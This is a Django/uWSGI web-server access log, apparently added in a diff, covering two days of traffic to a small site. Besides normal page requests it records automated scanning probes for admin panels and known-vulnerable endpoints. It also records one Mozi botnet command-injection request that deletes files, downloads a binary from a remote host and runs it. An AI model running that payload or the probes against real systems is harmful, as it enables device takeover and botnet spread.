+[pid: 18965|app: -1|req: -1/854] 117.100.100.38 () {40 vars in 948 bytes} [Sat Jan 9 03:13:38 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/855] 117.100.100.38 () {40 vars in 1052 bytes} [Sat Jan 9 03:13:40 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/856] 117.100.100.38 () {40 vars in 1058 bytes} [Sat Jan 9 03:13:40 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/857] 117.100.100.38 () {40 vars in 1020 bytes} [Sat Jan 9 03:13:40 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: 0|req: 607/858] 117.100.100.38 () {42 vars in 1084 bytes} [Sat Jan 9 03:13:43 2021] GET /my-admin => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 608/859] 117.100.100.38 () {42 vars in 1086 bytes} [Sat Jan 9 03:13:43 2021] GET /my-admin/ => generated 5354 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /favicon.ico
+[pid: 18965|app: 0|req: 609/860] 117.100.100.38 () {40 vars in 1007 bytes} [Sat Jan 9 03:13:44 2021] GET /favicon.ico => generated 3397 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 610/861] 117.100.100.38 () {40 vars in 1044 bytes} [Sat Jan 9 03:13:45 2021] GET /my-admin/ => generated 5354 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 611/862] 101.91.62.99 () {32 vars in 624 bytes} [Sat Jan 9 03:23:01 2021] GET /my-admin => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 612/863] 83.97.20.21 () {26 vars in 277 bytes} [Sat Jan 9 03:34:05 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 613/864] 92.246.216.16 () {28 vars in 403 bytes} [Sat Jan 9 03:45:19 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /boaform/admin/formLogin
+[pid: 18965|app: 0|req: 614/865] 167.99.215.147 () {44 vars in 782 bytes} [Sat Jan 9 04:00:47 2021] POST /boaform/admin/formLogin => generated 3434 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 615/866] 124.23.134.78 () {22 vars in 225 bytes} [Sat Jan 9 04:01:03 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 616/867] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 04:17:02 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /http:/example.com/
+[pid: 18965|app: 0|req: 617/868] 64.31.8.10 () {28 vars in 347 bytes} [Sat Jan 9 04:29:45 2021] GET http://example.com/ => generated 1665 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[uwsgi-http key: example.com client_addr: 64.31.8.10 client_port: 59103] hr_read(): Connection reset by peer [plugins/http/http.c line 917]
+Not Found: /dnspod.qcloud.com:443
+[pid: 18965|app: 0|req: 618/869] 64.31.8.10 () {26 vars in 337 bytes} [Sat Jan 9 04:29:45 2021] CONNECT dnspod.qcloud.com:443 => generated 1686 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /http:/110.242.68.4/
+[pid: 18965|app: 0|req: 619/870] 111.175.57.7 () {40 vars in 725 bytes} [Sat Jan 9 04:33:11 2021] HEAD http://110.242.68.4/ => generated 1670 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 620/871] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 04:59:34 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 621/872] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 05:39:34 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 622/873] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 06:18:08 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 623/874] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 06:18:55 2021] GET / => generated 6416 bytes in 2 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 624/875] 159.138.233.213 () {22 vars in 236 bytes} [Sat Jan 9 06:32:34 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 1)
+Not Found: /manager/html
+[pid: 18965|app: 0|req: 625/876] 159.138.233.213 () {24 vars in 302 bytes} [Sat Jan 9 06:32:34 2021] GET /manager/html => generated 3401 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /http:/example.com/
+[pid: 18965|app: 0|req: 626/877] 64.31.8.10 () {28 vars in 347 bytes} [Sat Jan 9 06:33:25 2021] GET http://example.com/ => generated 1665 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[uwsgi-http key: example.com client_addr: 64.31.8.10 client_port: 48858] hr_read(): Connection reset by peer [plugins/http/http.c line 917]
+Not Found: /dnspod.qcloud.com:443
+[pid: 18965|app: 0|req: 627/878] 64.31.8.10 () {26 vars in 337 bytes} [Sat Jan 9 06:33:25 2021] CONNECT dnspod.qcloud.com:443 => generated 1686 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 628/879] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 06:56:37 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 629/880] 83.97.20.34 () {26 vars in 277 bytes} [Sat Jan 9 07:25:27 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /TP/public/index.php
+[pid: 18965|app: 0|req: 630/881] 123.207.222.213 () {30 vars in 450 bytes} [Sat Jan 9 07:28:34 2021] GET /TP/public/index.php => generated 3421 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /TP/index.php
+[pid: 18965|app: 0|req: 631/882] 123.207.222.213 () {30 vars in 437 bytes} [Sat Jan 9 07:28:34 2021] GET /TP/index.php => generated 3400 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /thinkphp/html/public/index.php
+[pid: 18965|app: 0|req: 632/883] 123.207.222.213 () {30 vars in 473 bytes} [Sat Jan 9 07:28:34 2021] GET /thinkphp/html/public/index.php => generated 3454 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /html/public/index.php
+[pid: 18965|app: 0|req: 633/884] 123.207.222.213 () {30 vars in 455 bytes} [Sat Jan 9 07:28:34 2021] GET /html/public/index.php => generated 3427 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /public/index.php
+[pid: 18965|app: 0|req: 634/885] 123.207.222.213 () {30 vars in 445 bytes} [Sat Jan 9 07:28:34 2021] GET /public/index.php => generated 3412 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /TP/html/public/index.php
+[pid: 18965|app: 0|req: 635/886] 123.207.222.213 () {30 vars in 460 bytes} [Sat Jan 9 07:28:34 2021] GET /TP/html/public/index.php => generated 3436 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /elrekt.php
+[pid: 18965|app: 0|req: 636/887] 123.207.222.213 () {30 vars in 433 bytes} [Sat Jan 9 07:28:34 2021] GET /elrekt.php => generated 3394 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /index.php
+[pid: 18965|app: 0|req: 637/888] 123.207.222.213 () {30 vars in 431 bytes} [Sat Jan 9 07:28:34 2021] GET /index.php => generated 3391 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /users
+[pid: 18965|app: 0|req: 638/889] 123.207.222.213 () {34 vars in 519 bytes} [Sat Jan 9 07:28:35 2021] POST /users?page=&size=5 => generated 3397 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 639/890] 123.207.222.213 () {30 vars in 413 bytes} [Sat Jan 9 07:28:35 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 640/891] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 07:36:12 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 641/892] 212.64.18.182 () {28 vars in 321 bytes} [Sat Jan 9 08:07:43 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 642/893] 83.97.20.21 () {26 vars in 277 bytes} [Sat Jan 9 08:14:29 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 643/894] 83.97.20.21 () {26 vars in 276 bytes} [Sat Jan 9 08:52:17 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 644/895] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 09:34:44 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 645/896] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 10:16:44 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 646/897] 49.234.4.227 () {22 vars in 233 bytes} [Sat Jan 9 10:17:07 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 1)
+Not Found: /manager/html
+[pid: 18965|app: 0|req: 647/898] 49.234.4.227 () {24 vars in 299 bytes} [Sat Jan 9 10:17:07 2021] GET /manager/html => generated 3401 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 648/899] 46.245.46.147 () {28 vars in 403 bytes} [Sat Jan 9 10:18:57 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 649/900] 212.64.18.182 () {28 vars in 320 bytes} [Sat Jan 9 11:27:02 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 650/901] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 11:33:12 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 651/902] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 12:11:00 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 652/903] 45.184.17.98 () {28 vars in 409 bytes} [Sat Jan 9 12:38:11 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 653/904] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 12:48:03 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 654/905] 219.228.146.245 () {38 vars in 813 bytes} [Sat Jan 9 12:52:31 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 655/906] 219.228.146.245 () {48 vars in 936 bytes} [Sat Jan 9 12:52:36 2021] POST / => generated 27 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 324 bytes (2 switches on core 1)
+[pid: 18965|app: 0|req: 656/907] 219.228.146.245 () {40 vars in 865 bytes} [Sat Jan 9 12:52:36 2021] GET /home/ => generated 8646 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 657/908] 219.228.146.245 () {40 vars in 882 bytes} [Sat Jan 9 12:52:38 2021] GET /single-an-1 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 658/909] 219.228.146.245 () {40 vars in 884 bytes} [Sat Jan 9 12:52:38 2021] GET /single-an-1/ => generated 3045 bytes in 3 msecs (HTTP/1.1 200) 5 headers in 167 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 659/910] 219.228.146.245 () {40 vars in 878 bytes} [Sat Jan 9 12:52:53 2021] GET /all-0-0-0 => generated 9504 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: -1|req: -1/911] 219.228.146.245 () {40 vars in 909 bytes} [Sat Jan 9 12:52:53 2021] GET /static/img/t_photo/6_%E9%80%89%E6%8B%A9%E5%99%A8%E6%9D%83%E9%87%8D.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/912] 219.228.146.245 () {40 vars in 885 bytes} [Sat Jan 9 12:52:53 2021] GET /static/img/t_photo/7_%E7%8E%A9%E5%85%B7%E8%BD%A6.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 18965|app: 0|req: 660/913] 219.228.146.245 () {40 vars in 882 bytes} [Sat Jan 9 12:53:00 2021] GET /single/7/ => generated 8331 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 661/914] 219.228.146.245 () {40 vars in 882 bytes} [Sat Jan 9 12:53:37 2021] GET /single/6/ => generated 8830 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: -1|req: -1/915] 219.228.146.245 () {40 vars in 957 bytes} [Sat Jan 9 12:53:38 2021] GET /static/img/r_photo/3_%E6%96%87%E6%9C%AC%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%B8%B8%E7%94%A8%E6%A0%87%E7%AD%BE.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 18965|app: 0|req: 662/916] 193.118.53.202 () {30 vars in 438 bytes} [Sat Jan 9 13:30:18 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 663/917] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 14:10:23 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 664/918] 83.97.20.21 () {26 vars in 277 bytes} [Sat Jan 9 14:52:31 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 665/919] 13.52.186.81 () {30 vars in 446 bytes} [Sat Jan 9 15:30:15 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 666/920] 83.97.20.21 () {26 vars in 277 bytes} [Sat Jan 9 15:30:53 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 667/921] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 16:13:10 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 668/922] 101.32.185.202 () {22 vars in 236 bytes} [Sat Jan 9 16:15:33 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 1)
+Not Found: /manager/html/
+[pid: 18965|app: 0|req: 669/923] 101.32.185.202 () {24 vars in 304 bytes} [Sat Jan 9 16:15:33 2021] GET /manager/html/ => generated 3404 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 670/924] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 16:55:04 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 671/925] 83.97.20.21 () {26 vars in 277 bytes} [Sat Jan 9 17:04:39 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /board.cgi
+[pid: 18965|app: 0|req: 672/926] 42.228.41.21 () {22 vars in 433 bytes} [Sat Jan 9 17:47:12 2021] GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://42.228.41.21:45718/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron => generated 3488 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 673/927] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 18:11:45 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 674/928] 182.254.152.219 () {22 vars in 236 bytes} [Sat Jan 9 18:21:07 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 1)
+Not Found: /manager/html
+[pid: 18965|app: 0|req: 675/929] 182.254.152.219 () {24 vars in 302 bytes} [Sat Jan 9 18:21:07 2021] GET /manager/html => generated 3401 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 676/930] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 18:48:33 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 677/931] 51.158.116.248 () {22 vars in 236 bytes} [Sat Jan 9 18:57:33 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 1)
+Not Found: /manager/html
+[pid: 18965|app: 0|req: 678/932] 51.158.116.248 () {24 vars in 301 bytes} [Sat Jan 9 18:57:33 2021] GET /manager/html => generated 3401 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 679/933] 83.97.20.21 () {26 vars in 277 bytes} [Sat Jan 9 19:24:23 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /admin-scripts.asp
+[pid: 18965|app: 0|req: 680/934] 195.24.65.111 () {28 vars in 458 bytes} [Sat Jan 9 19:58:13 2021] GET /admin-scripts.asp => generated 3410 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /admin-scripts.asp
+[pid: 18965|app: 0|req: 681/935] 195.24.65.111 () {28 vars in 458 bytes} [Sat Jan 9 19:58:14 2021] GET /admin-scripts.asp => generated 3410 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 682/936] 83.97.20.34 () {26 vars in 278 bytes} [Sat Jan 9 20:16:02 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 683/937] 198.20.124.218 () {30 vars in 438 bytes} [Sat Jan 9 20:28:37 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 684/938] 83.97.20.21 () {26 vars in 277 bytes} [Sat Jan 9 20:39:13 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 685/939] 83.97.20.21 () {26 vars in 277 bytes} [Sat Jan 9 21:14:17 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 686/940] 187.108.78.110 () {28 vars in 404 bytes} [Sat Jan 9 21:25:12 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 687/941] 83.97.20.21 () {26 vars in 277 bytes} [Sat Jan 9 21:51:50 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /seeyon/htmlofficeservlet
+[pid: 18965|app: 0|req: 688/942] 106.75.137.63 () {30 vars in 532 bytes} [Sat Jan 9 22:05:00 2021] GET /%73%65%65%79%6F%6E/%68%74%6D%6C%6F%66%66%69%63%65%73%65%72%76%6C%65%74 => generated 3436 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /secure/ContactAdministrators!default.jspa
+[pid: 18965|app: 0|req: 689/943] 106.75.137.63 () {30 vars in 520 bytes} [Sat Jan 9 22:05:00 2021] GET /secure/ContactAdministrators!default.jspa => generated 3487 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /weaver/bsh.servlet.BshServlet
+[pid: 18965|app: 0|req: 690/944] 106.75.137.63 () {30 vars in 496 bytes} [Sat Jan 9 22:05:00 2021] GET /weaver/bsh.servlet.BshServlet => generated 3451 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /solr/
+[pid: 18965|app: 0|req: 691/945] 106.75.137.63 () {30 vars in 448 bytes} [Sat Jan 9 22:05:00 2021] GET /solr/ => generated 3379 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /console/login/LoginForm.jsp
+[pid: 18965|app: 0|req: 692/946] 106.75.137.63 () {30 vars in 492 bytes} [Sat Jan 9 22:05:00 2021] GET /console/login/LoginForm.jsp => generated 3445 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /manager/html
+[pid: 18965|app: 0|req: 693/947] 106.75.137.63 () {30 vars in 477 bytes} [Sat Jan 9 22:05:00 2021] GET /manager/html => generated 3400 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /axis2/axis2-admin/login
+[pid: 18965|app: 0|req: 694/948] 106.75.137.63 () {34 vars in 520 bytes} [Sat Jan 9 22:05:00 2021] POST /axis2/axis2-admin/login => generated 3434 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 695/949] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 22:27:01 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 696/950] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 23:21:22 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 697/951] 179.52.154.19 () {22 vars in 235 bytes} [Sat Jan 9 23:53:56 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 698/952] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 00:13:59 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 699/953] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 01:17:04 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 700/954] 101.32.12.80 () {22 vars in 233 bytes} [Sun Jan 10 01:18:07 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 1)
+Not Found: /manager/html/
+[pid: 18965|app: 0|req: 701/955] 101.32.12.80 () {24 vars in 301 bytes} [Sun Jan 10 01:18:07 2021] GET /manager/html/ => generated 3404 bytes in 3 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /config/getuser
+[pid: 18965|app: 0|req: 702/956] 209.141.46.241 () {36 vars in 618 bytes} [Sun Jan 10 02:01:29 2021] GET /config/getuser?index=0 => generated 3414 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 703/957] 192.241.223.179 () {30 vars in 343 bytes} [Sun Jan 10 02:04:17 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 704/958] 220.133.1.18 () {36 vars in 499 bytes} [Sun Jan 10 02:06:04 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 705/959] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 02:32:44 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 188, in _get_response
+ self.check_response(response, callback)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 311, in check_response
+ "instead." % name
+ValueError: The view app01.views.login didn't return an HttpResponse object. It returned None instead.
+[pid: 18965|app: 0|req: 706/960] 89.248.168.108 () {22 vars in 226 bytes} [Sun Jan 10 03:24:01 2021] HEAD / => generated 52528 bytes in 23 msecs (HTTP/1.0 500) 6 headers in 186 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 707/961] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 03:36:13 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 708/962] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 04:58:05 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /boaform/admin/formLogin
+[pid: 18965|app: 0|req: 709/963] 14.232.134.127 () {22 vars in 317 bytes} [Sun Jan 10 05:09:10 2021] GET /boaform/admin/formLogin?username=user&psd=user => generated 3461 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 710/964] 83.97.20.34 () {26 vars in 278 bytes} [Sun Jan 10 06:15:32 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 711/965] 183.136.225.35 () {30 vars in 411 bytes} [Sun Jan 10 06:25:51 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 712/966] 183.136.225.35 () {32 vars in 472 bytes} [Sun Jan 10 06:26:12 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
